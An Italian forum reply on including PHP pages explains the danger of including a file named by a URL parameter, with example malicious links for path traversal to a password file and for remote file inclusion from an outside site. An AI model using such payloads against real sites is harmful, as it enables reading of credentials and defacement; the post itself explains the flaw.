Certo.Originariamente inviato da LinkShadow
Ti ringrazio moltissimo per la risposta.
Non ci sarebbe un modo alternativo all' aggiungere in ogni pagina
visto che ho bisogno solo di $contenuto ?Codice PHP:<?php $contenuto="..."; ?>
In ongi pagina metti solo l'html.
Poi per richiamarla fai:
Veniamo ora alla injection:Codice PHP:$contenuto=include("./file.html");
tu ricevi il link: localhost/index.php?pg=casa.php
Allora includi la pagina casa.php.
Allora io posso mandarti un link malevolo per vedere file che tu non vorresti farmi vedere:
localhost/index.php?pg=../config/password.php
Oppure, se il server web non è configurato a dovere:
localhost/index.php?pg=http://www.deface.com/index.html

Rispondi quotando